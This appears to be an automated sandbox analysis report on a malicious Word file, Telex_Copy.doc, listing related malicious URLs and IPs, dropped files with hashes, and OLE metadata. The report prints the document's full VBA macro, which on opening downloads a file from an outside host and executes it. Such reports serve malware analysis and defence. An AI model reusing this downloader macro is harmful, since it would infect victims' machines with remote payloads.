Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
adobetarget.data.adobedc.net	http://eloisastyle.rivetingweb.com/xmlrpc/includes/chasenew/chasenew/chase/index.html	Get hash	malicious	Unknown	Browse	66.235.152.152
	P.S.P_PO231237.doc	Get hash	malicious	Unknown	Browse	66.235.152.113
	https://www.xero.com/security	Get hash	malicious	Unknown	Browse	66.235.152.152
	http://7oqnsnzwwnm6zb7y.payoptionserver.com/9mj4dh	Get hash	malicious	Unknown	Browse	66.235.152.113
	https://tagstaticx.com/r.html?axcid=e7ddf874-40d2-43d7-b8fd-56541bff0853&axtsid=4861647&axcusid1=4871252&clid=%7Bymid%7D&r=https://zpreland.com/?b=12040523&ba=1&campid=5268766&did=2&dm=0&ep=1&fp=0&g=LU&i18db=1&l=GTcdOYaHegWVtMq&oaid=b9efb6c3c95e468ebd3b768f12bec2bd&s=538218779229033377&ssk=5adcf7e08568c1ac67549bdb0fbce8bf&svar=1649884919&vi=1&vo=1&z=4861647&tr=default&axcusid2=%7Bvertical%7D	Get hash	malicious	Unknown	Browse	66.235.152.115
	PO29-09123.doc	Get hash	malicious	Unknown	Browse	66.235.152.126
	https://pcmartusa.com	Get hash	malicious	Unknown	Browse	66.235.152.107
	http://aarp.org/research	Get hash	malicious	HTMLPhisher	Browse	66.235.152.143
	https://manage-new-device.web.app/	Get hash	malicious	Unknown	Browse	66.235.152.126
	Payment_Copy.pdf.exe	Get hash	malicious	Remcos	Browse	66.235.152.152
	splitting.htm	Get hash	malicious	Unknown	Browse	66.235.152.115
	http://wizardly-carson.34-88-132-120.plesk.page/	Get hash	malicious	Unknown	Browse	66.235.152.143
	https://links.dropbox.com/u/click?_t=60154b197d654466a40480a2b908d3b7&_m=2741555be7f74317b724e18eb6d7bb53&_e=D9XENxt2ANhwiUzHWcGaTvcfcT1pMbovByhiKUQwpLO3YG3kZ1QkdaNBZ1zSLO_TnlA7vEENoAwXzeJDDc_zzspCBPECNtc2EQuR25aMTFHQhKYxqxm95kun9TKLo4ZjdtawfOSOqeYttR5LHlFSiXXlXbbA4uK264V1GKXAALXp4Ue8hP5L3huCcnvzB-2al00ySdwu4mdHmBFBSDXuOc1vY3jqb7t-PUHKDX3fsIBRPXvLzpmPOIK5U3w_2VQMdKbhuASpw-cgia16YJhGeb1MVGVEQaudr5pL1mME1hi-J8Nu5zWp8PA67NZNWZAddT5vxGgFChnj-lGogelgc-OLcpxPzWvy66c-6wUBAmRx0tI9ULvg4HeDIC-bp3C-NQ9xrV0B72qPCnoUoZM54JjpRpccJnYnHW8uKO69ce4%3D	Get hash	malicious	Unknown	Browse	15.188.95.229
	US Economic Outlook Conf Call November 4 2022 (1).docx	Get hash	malicious	Unknown	Browse	15.188.95.229
	https://paper.li/AoKDVd4o8OpYYL5DtamXz/story/vitality-medical-iWPgc79KTjhvhk86uCTmk	Get hash	malicious	HTMLPhisher	Browse	15.188.95.229
	https://www.thomsonreuters.com/?utm_campaign=C2C%20Project%20Tarpon%20Oct%2022_Customers%20contacted&utm_medium=email&utm_source=Eloqua&elqTrackId=f55b99f63920492f917e2d5074866fd4&elq=f89c7e9297f148f09626bb82c248d6f6&elqaid=1064&elqat=1&elqCampaignId=827	Get hash	malicious	Unknown	Browse	13.36.218.177
	http://track.smtpserver.email/9087542/c?p=Gv-eSZnt4VbgPogJd14_MIWrIjlKLXYir761n6qFqKwMRd2e4fpaIhgXohQWE5RHRPkTZUCvIx1TTFBWFSffjh05oOJEUtk2tcSohL9Je6byGLmQ5joMD887NCvZTkgNAZfsbjQwkJk6yhaPMb_Kcl9IHNRIuxppQ_sDH1Pxh_iWIUGRXU0KKwVUmFlgOr5EUHqReHhc18XJhTB6uxHwj5ofblsQbTCpfckbrc_tBLueoR5pHv9zEiAOe08e6rf8JJt10qWV7M--tWzJNbrrvQ==	Get hash	malicious	Unknown	Browse	15.188.95.229
	http://box-gov.com	Get hash	malicious	Unknown	Browse	15.236.176.210
	http://Account.box-gov.com/login	Get hash	malicious	Unknown	Browse	13.36.218.177
	https://www.amwc-na.com/en/home.html	Get hash	malicious	Unknown	Browse	15.188.95.229

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://k1e4hf.vqyys.ellisfence.com	Get hash	malicious	Unknown	Browse	104.22.1.204
	https://www.google.com/amp/s/lavena.vn%2Fsouth-yk%2FtLKzT%2F84861%2FYm9ibWFydGluQGF0bGFudGFmb3JrbGlmdHMuY29t	Get hash	malicious	Unknown	Browse	104.18.16.182
	Automann-_Order2#44096.docx.doc	Get hash	malicious	Unknown	Browse	172.67.196.186
	https://www.gasponsacco.it/e-file.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	company_profile.docx.doc	Get hash	malicious	Unknown	Browse	104.26.6.49
	Automann-_Order2#44096.docx.doc	Get hash	malicious	Unknown	Browse	104.21.41.237
	https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5	Get hash	malicious	HTMLPhisher	Browse	104.18.3.35
	company_profile.docx.doc	Get hash	malicious	Unknown	Browse	104.26.7.49
	NEW_ORDER.docx.doc	Get hash	malicious	Unknown	Browse	104.26.6.49
	http://downloads.sourceforge.net/project/antinat/antinat/0.80/antinat.exe?r=http://downloads.sourceforge.net%5C%5Cu0026ts=gAAAAABkZuiIhoazbWL92yvXzZfWPjIb3SxTRRBpH08osl0Ud-g8e-YuAxCnFkvJl0mia8g-oUDq3KZG7WEmAsgFTRcfmQseng==%5C%5Cu0026use_mirror=gigenet	Get hash	malicious	Unknown	Browse	104.18.25.173
	NEW_ORDER.docx.doc	Get hash	malicious	Unknown	Browse	104.26.7.49
	https://sharepoint-gwinnettsleep.webflow.io	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	http://downloads.sourceforge.net/project/antinat/antinat/0.80/antinat.exe?r=http://downloads.sourceforge.net%5C%5Cu0026ts=gAAAAABkZuiIhoazbWL92yvXzZfWPjIb3SxTRRBpH08osl0Ud-g8e-YuAxCnFkvJl0mia8g-oUDq3KZG7WEmAsgFTRcfmQseng==%5C%5Cu0026use_mirror=gigenet	Get hash	malicious	Unknown	Browse	104.18.10.128
	https://a70b09a.com/ffoollllooww/track655587916392911/f1champ3@matebargain.click/https%253A%252F%252Fwww.kly-t.com%252Fk%252F64727dda013e78a8ba3b545f#ZXNwYWNvLmFlcmVvQG5hdi5wdA==&ce-00	Get hash	malicious	HTMLPhisher	Browse	104.18.23.52
	http://southernsun.solar	Get hash	malicious	HTMLPhisher	Browse	104.18.10.207
	https://u-486296817234.ucbkofbgocppld4fvthtsl6q.lat/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.bing.com/ck/a?!&&p=b0fa79deef7e4dbdJmltdHM9MTY4Mjg5OTIwMCZpZ3VpZD0zZGE2NjlhNS05MmZjLTZlYzAtMjQzMS03YmFiOTNmNTZmNDgmaW5zaWQ9NTE3MQ&ptn=3&hsh=3&fclid=3da669a5-92fc-6ec0-2431-7bab93f56f48&psq=site%3alumenpatriacharum.org&u=a1aHR0cHM6Ly93d3cubHVtZW5wYXRyaWFjaGFydW0ub3JnL2Jsb2cvMmp1MHI5NTc2ZDltczlramxlM3p3ZzJnZGx2aDJz&ntb#eyJlbWFpbCI6IlltVjBhRjlzWVdOdmMzTmxRR1prTG05eVp3PT0iLCJyYW5kIjoiMTMifQ==	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	Betalingsbewijs.xlsx	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse	188.114.96.3
	ObGionhP0q.elf	Get hash	malicious	Mirai, Moobot	Browse	172.67.160.131
	https://epicmpls.com	Get hash	malicious	Unknown	Browse	1.1.1.1

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	329216
Entropy (8bit):	7.742678604382608
Encrypted:	false
SSDEEP:	6144:b46t6kN4X+4hUkSO3nGmTs4XWx2OLk2upvw9WxkgMLeU4ZINBkJT42K:rIu4hZ1BTAdLd8vwEkbSuBw4/
MD5:	C332F541894866C101840B77191EFAA8
SHA1:	2A5E0B762A61C926C1AA3A61B3DD1FE56DEA0F1B
SHA-256:	E83805100A3FA98E0B2B134A5C39758AE565D82BF77DD3C9F15D03EA54F01637
SHA-512:	F4DC6F22917F293FAF1E5A9981B11B5EAF503167ED6E926F2811200893C54CAA8C6ACAA454DB0306F18725FC20E0E310BE594993C411BB2C198983D686D01F1E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 54%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xvd..............0.................. ... ....@.. .......................`............`.....................................W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........e..............2...........................................^..}.....(.......(........s....}......(......r...po.....^..}.....(.......(.......^..}.....(.......(........}.....rT..psj...}......}.....(.......(.....&..(.....V(k...rL..p(............}.....rT..psj...}/.....}0....(.......(,....&..(!......rT..psj...}D.....}F....(.......(2....V..{D...ok.....(/....B~....(#....E.....rT..psj...}H.....}I....(.......(9....V..{H...ok.....(6....*..rT..psj...}K.....}L.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B42B132F-BBD5-498C-8DAF-6207449BFE1E}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	4.571007733534506
Encrypted:	false
SSDEEP:	192:LtdCo8eZoPw1ylYhcr00b2izioTef0jis3o6nla:Ltd8Kys0b2izioY0jigVn
MD5:	694E746938B2C164145FA8D965F8014B
SHA1:	2E42363A13AA78DCD161CAC34E410DEC3B4923C9
SHA-256:	93B96A9BAF064F684141AF5D60A0B9B923172F6BBBD5EC43A625F9551BEC597E
SHA-512:	1A36C3D8257348D287EA276D7A02A5BA1D79096FBE6463930F149BE0D8D75D89C7CF03C580BA6B8FB72EB395A9FF8A8C5B2B5E101E643489E67517839D8615EB
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C7CAC9BC-1140-4E43-A415-F39DE2B8E989}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF27C1B5AE15FF2044.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	4.280257477428708
Encrypted:	false
SSDEEP:	768:ttyrotqiJtzYK+jromZtwiVv9NaPGfa1KV:SrofJtzYzj3gEaPGfa1KV
MD5:	251A6DCD63BC74BF5E22434108E7C0B3
SHA1:	267BCAFDF2F1563CEA072D241297E24044DE9B2B
SHA-256:	824D511C0EEE2735C7EAA217DAB167F34483AFFF85B7512E20104DC16BEFF114
SHA-512:	F1548204EB5019EC754B932AD958F1319608EC31697C6A841AD67ED62FC53CE5B575693D081C181D0BDD577932880F102C5C85CF531E8EBC972E09CA6DC8A71A
Malicious:	true
Yara Hits:	Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DF27C1B5AE15FF2044.TMP, Author: Florian Roth (Nextron Systems)
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4...D................................................................................................................... ...!..."...#.......%...&...'...(...)...2...+...,...-......./...0...1...$...3.......B...6...7...8...9...:...;...<...=...>...?...C...A...........................H...I...J...K...L...M...N...@...............................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD5CA9A1D41FFC491.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Telex_Copy.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:46:42 2022, mtime=Tue Mar 8 15:46:42 2022, atime=Wed May 31 23:08:58 2023, length=49152, window=hide
Category:	dropped
Size (bytes):	1014
Entropy (8bit):	4.530251754166446
Encrypted:	false
SSDEEP:	12:8/ylcFgXg/XAlCPCHaXaBdLB/oxdvX+WTncfMricvb8EO6bDtZ3YilMMEpxRljKJ:8/ylY/XTqTA4XeouDv3qvyA7yJ
MD5:	24A91DEE40200213BD062F75E121C57A
SHA1:	3CF9077BDBEDDFB0331FC5B85FB59BD26922F282
SHA-256:	8C871909DB1159926EE9709E3E1525D2506C24E93CEE1CB0033B2F6CC79720B9
SHA-512:	318F1EC9372A3C266FA7B00E304B2CB8EC6094F68559DC3437592B7A4B9756893D63350F4530798DE3A5189ECA4F89122015BBD3E6202B5524D3E0288BE75F25
Malicious:	false
Preview:	L..................F.... ........3.......3...#C.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT...user.8......QK.XhT....&=....U...............A.l.b.u.s.....z.1.....hT...Desktop.d......QK.XhT...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2......V . .TELEX_~1.DOC..J......hT.hT..../.....4...............T.e.l.e.x._.C.o.p.y...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\642294\Users.user\Desktop\Telex_Copy.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.T.e.l.e.x._.C.o.p.y...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......642294..........D_....3N...W...9H..N..... .....[D_....3N...W...9H..N..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [doc]
Category:	dropped
Size (bytes):	71
Entropy (8bit):	4.559467324848562
Encrypted:	false
SSDEEP:	3:bDuMJlpOmUmX1GJ3mUv:bCiOvpx
MD5:	D8EFF2BE4DA9656E5530F0CA4FC6396E
SHA1:	A921191A16A5D7113ADD8FCB58361B6106F46854
SHA-256:	E8578F5B78F8FC1343F136C2FB0331B4AD7AE1169825C5AC10E873254E5254D6
SHA-512:	40745ACFF3861B05FB696E8E43B9E95BFBA3AB394517C25A625C98D66E60EAA77AF55B61E057D510743ADDBFBDE23F5C266827F9DB4DE3392AFF719C89A341F1
Malicious:	false
Preview:	[folders]..Templates.LNK=0..Telex_Copy.LNK=0..[doc]..Telex_Copy.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

C:\Users\user\Desktop\~$lex_Copy.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

C:\Windows\System32\TelexCopy.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	329216
Entropy (8bit):	7.742678604382608
Encrypted:	false
SSDEEP:	6144:b46t6kN4X+4hUkSO3nGmTs4XWx2OLk2upvw9WxkgMLeU4ZINBkJT42K:rIu4hZ1BTAdLd8vwEkbSuBw4/
MD5:	C332F541894866C101840B77191EFAA8
SHA1:	2A5E0B762A61C926C1AA3A61B3DD1FE56DEA0F1B
SHA-256:	E83805100A3FA98E0B2B134A5C39758AE565D82BF77DD3C9F15D03EA54F01637
SHA-512:	F4DC6F22917F293FAF1E5A9981B11B5EAF503167ED6E926F2811200893C54CAA8C6ACAA454DB0306F18725FC20E0E310BE594993C411BB2C198983D686D01F1E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 54%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xvd..............0.................. ... ....@.. .......................`............`.....................................W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........e..............2...........................................^..}.....(.......(........s....}......(......r...po.....^..}.....(.......(.......^..}.....(.......(........}.....rT..psj...}......}.....(.......(.....&..(.....V(k...rL..p(............}.....rT..psj...}/.....}0....(.......(,....&..(!......rT..psj...}D.....}F....(.......(2....V..{D...ok.....(/....B~....(#....E.....rT..psj...}H.....}I....(.......(9....V..{H...ok.....(6....*..rT..psj...}K.....}L.

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: 7ala, Template: Normal, Last Saved By: Admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sun Apr 30 02:59:00 2023, Last Saved Time/Date: Sun Apr 30 02:59:00 2023, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Entropy (8bit):	4.46204855311401
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	Telex_Copy.doc
File size:	43520
MD5:	211e6002d69560d311f90715736f76d6
SHA1:	98cb9639a3d5a0faee4ceaa4fe2cbdca8f8d31f8
SHA256:	91cf5e5060f254905b48d517addd966c3f43454de14c376e8cb3b45fbd3058c9
SHA512:	4704d8370b4ff09a3aa8c512c3a4b600f5fddd1e712f4d49b7182cbed1a0093187f750d035cfd5bfca84ae1e67be2242cad186b04d412c86af864d2e79ccf5eb
SSDEEP:	384:TdrF3nfkolOCnC3p2MyM1Z5gB8iSwvxjk+tJm/Ortde1UV6Deop9myVG+50jigVn:hx3MoltC3d1Z54xw+tAz1UV6DPhL+V
TLSH:	BE13D601B2CACA1BF22659324DD3C6D57738BD199E46D30B32847F2EBCB46708E26781
File Content Preview:	........................>.......................5...........8...............4..................................................................................................................................................................................

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "Telex_Copy.doc"

Indicators

Has Summary Info:
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Title:
Subject:
Author:
Keywords:
Comments:
Template:
Last Saved By:
Revion Number:	2
Total Edit Time:	0
Create Time:	2023-05-31 01:59:00
Last Saved Time:	2023-05-31 01:59:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	1
Creating Application:
Security:	0

Document Summary

Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 3940

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	3940
Data ASCII:	. . . . . . . . . , . . . . . . . . . . m . . . { . . . o . . . . . . . . . . . M 4 c . . . . . . . . . . . . . . . . . . . . p . . . . W % I E ] . . . z . . O F ] ] N . . . . . . . . . . . . . . . . . . . . y \| _ q F a y . . . . . . . . . . . . . . . . . . . . . . x . . . . y \| _ q F a y . W % I E ] . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . P . . . . . S " . . . . S . . . . . S " . . . . 6 " . . . . . . . . . . . < 0 . . . . . . < 8 . . . . . . < . . . . . . . . . . ( . 1 . N . o . r
Data Raw:	01 16 03 00 06 00 01 00 00 2c 07 00 00 e4 00 00 00 12 02 00 00 6d 07 00 00 7b 07 00 00 6f 0c 00 00 00 00 00 00 01 00 00 00 4d 34 63 17 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 d6 96 d1 57 25 eb 49 45 92 92 5d 1c dd b3 ce 00 b1 7a 0b bd 0f 4f c3 46 bc 5d b7 5d c0 4e ff 84 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const ERROR_SUCCESS As Long = 0
Private Const BINDF_GETNEWESTVERSION As Long = &H10
Private Const INTERNET_FLAG_RELOAD As Long = &H80000000
Private Sub Document_Open()
Dim gFx17LOa
Dim lS8slOu6
Dim w0Bnu7E
Dim WBN As String
WBN = "Microsoft.XMLHTTP"
Dim MIC As String
MIC = "ADODB.Stream"
Dim WNE As String
WNE = "WScript.Shell"
Dim EWA As String
EWA = "GET"
Dim RES As String
RES = "HTTP"
Dim Com As String
Com = "Component"
Set gFx17LOa = CreateObject(WBN)
Set lS8slOu6 = CreateObject(MIC)
Set w0Bnu7E = CreateObject(WNE)
Dim Dow As String
Dow = "DownloadData"
U = "http://topvaluationfirms.com/TelexCopy.png"
N = "TelexCopy.png"
Dim Async As String
Async = "DownloadFileAsync"
gFx17LOa.Open EWA, U, False
gFx17LOa.send
Dim SEC As String
EWA = "Net"
Dim Con As String
Con = "Web"
Dim yte As String
yte = "Client"
lS8slOu6.Type = 1
lS8slOu6.Open
lS8slOu6.write gFx17LOa.responseBody
lS8slOu6.savetofile N, 2
Shell (N)
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.235956365095031
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.2416851540298004
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.4293427898005266
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 a l a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f8 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6938

General
Stream Path:	1Table
File Type:	data
Stream Size:	6938
Entropy:	5.910207788982179
Base64 Encoded:	True
Data ASCII:	" . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
